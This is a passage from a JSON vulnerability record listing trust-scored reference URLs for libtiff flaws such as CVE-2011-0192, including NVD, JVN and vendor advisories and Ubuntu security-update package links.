            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu574588"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu556020"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-0192"
          },
          {
            "trust": 0.6,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0192"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2020.2340/"
          },
          {
            "trust": 0.4,
            "url": "http://www.apple.com/itunes/"
          },
          {
            "trust": 0.3,
            "url": "http://bugzilla.maptools.org/show_bug.cgi?id=2297"
          },
          {
            "trust": 0.3,
            "url": "http://www.libtiff.org/"
          },
          {
            "trust": 0.3,
            "url": "http://support.avaya.com/css/p8/documents/100133190"
          },
          {
            "trust": 0.3,
            "url": "http://btsc.webapps.blackberry.com/btsc/search.do?cmd=displaykc\u0026doctype=kc\u0026externalid=kb27244"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0191"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2630"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3087"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2595"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2482"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2483"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2597"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1167"
          },
          {
            "trust": 0.2,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2.orig.tar.gz"
          },
          {
            "trust": 0.2,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.7.4.orig.tar.gz"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2598"
          },
          {
            "trust": 0.2,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.9.2.orig.tar.gz"
          },
          {
            "trust": 0.2,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.9.4.orig.tar.gz"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0216"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0241"
          },
          {
            "trust": 0.2,
            "url": "https://www.apple.com/support/security/pgp/"
          },
          {
            "trust": 0.2,
            "url": "http://support.apple.com/kb/ht1222"
          },
          {
            "trust": 0.1,
            "url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026amp;y=2011\u0026amp;m=slackware-security.587820"
          },
          {
            "trust": 0.1,
            "url": "http://www.debian.org/security/faq"
          },
          {
            "trust": 0.1,
            "url": "http://www.debian.org/security/"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-7ubuntu3.7.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.7_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.9.4-2ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-doc_3.8.2-13ubuntu0.4_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.7_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-13ubuntu0.4_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.9.2-2ubuntu0.4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.9_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.7_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.9_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-13ubuntu0.4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.9.4-2ubuntu0.1_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-13ubuntu0.4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-13ubuntu0.4_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-doc_3.9.4-2ubuntu0.1_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.9.2-2ubuntu0.4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.9.4-2ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.9_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.9.4-2ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.9.4-2ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.9_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.9.2-2ubuntu0.4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.9.4-2ubuntu0.1_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.9.2-2ubuntu0.4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.7_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.9_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.7_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.7_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.7_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.7.4-1ubuntu3.9.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.9_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.9.2-2ubuntu0.4.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.9.2-2ubuntu0.4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.7_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-13ubuntu0.4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.7_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-13ubuntu0.4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-13ubuntu0.4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.9_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.7_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.9.4-2ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-13ubuntu0.4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.7_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.9.2-2ubuntu0.4_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.9.4-2ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.9_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.9.2-2ubuntu0.4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-13ubuntu0.4_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-13ubuntu0.4_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.9.2-2ubuntu0.4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.9.2-2ubuntu0.4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.7.4-1ubuntu3.9.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-13ubuntu0.4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-13ubuntu0.4_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-13ubuntu0.4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-doc_3.9.2-2ubuntu0.4_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.9_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.9.2-2ubuntu0.4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.9.2-2ubuntu0.4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.9.4-2ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.9.2-2ubuntu0.4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.9.4-2ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.9.4-2ubuntu0.1_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.9_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.9_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.9.2-2ubuntu0.4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-13ubuntu0.4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.9.4-2ubuntu0.1_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.9.4-2ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.9.2-2ubuntu0.4_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.7_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.9.4-2ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.9.2-2ubuntu0.4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.9.4-2ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-13ubuntu0.4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.7_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.9_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-13ubuntu0.4_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.9_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-13ubuntu0.4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.9_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.9.4-2ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-7ubuntu3.7.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.7_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-13ubuntu0.4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.9.2-2ubuntu0.4_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.9.4-2ubuntu0.1_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.9_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.9.4-2ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.7_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.9_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-13ubuntu0.4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.9.4-2ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.9.2-2ubuntu0.4_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.9.4-2ubuntu0.1.debian.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.9_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.7_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.9.4-2ubuntu0.1.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.7_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.7_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.9.2-2ubuntu0.4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-13ubuntu0.4_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.7_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-13ubuntu0.4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.9_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.9_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-13ubuntu0.4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.9.2-2ubuntu0.4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.7_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.9.2-2ubuntu0.4_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-13ubuntu0.4_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-13ubuntu0.4.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.7_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-13ubuntu0.4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-13ubuntu0.4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.7_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.7_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.9.2-2ubuntu0.4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-13ubuntu0.4_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.9.2-2ubuntu0.4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.7_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.9.2-2ubuntu0.4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-13ubuntu0.4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.9.2-2ubuntu0.4.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-13ubuntu0.4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.9.2-2ubuntu0.4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-13ubuntu0.4.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-13ubuntu0.4_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.7_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.9.2-2ubuntu0.4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.9_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.9.4-2ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-13ubuntu0.4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-7ubuntu3.8.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-13ubuntu0.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.8_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-doc_3.9.4-2ubuntu0.2_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.9.4-2ubuntu0.2_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.10_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.9.2-2ubuntu0.5_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.10_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.10_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.9.4-2ubuntu0.2.debian.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.10_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-7ubuntu3.8.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.10_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-13ubuntu0.5.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-13ubuntu0.5_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-13ubuntu0.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.9.2-2ubuntu0.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.9.4-2ubuntu0.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.9.2-2ubuntu0.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.10_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-13ubuntu0.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.9.2-2ubuntu0.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-13ubuntu0.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.10_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.9.4-2ubuntu0.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.8_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-13ubuntu0.5_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.9.2-2ubuntu0.5.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.9.4-2ubuntu0.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.8_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.8_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.9.4-2ubuntu0.2.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.10_i386.deb"
          },
          {
            "trust": 0.1,
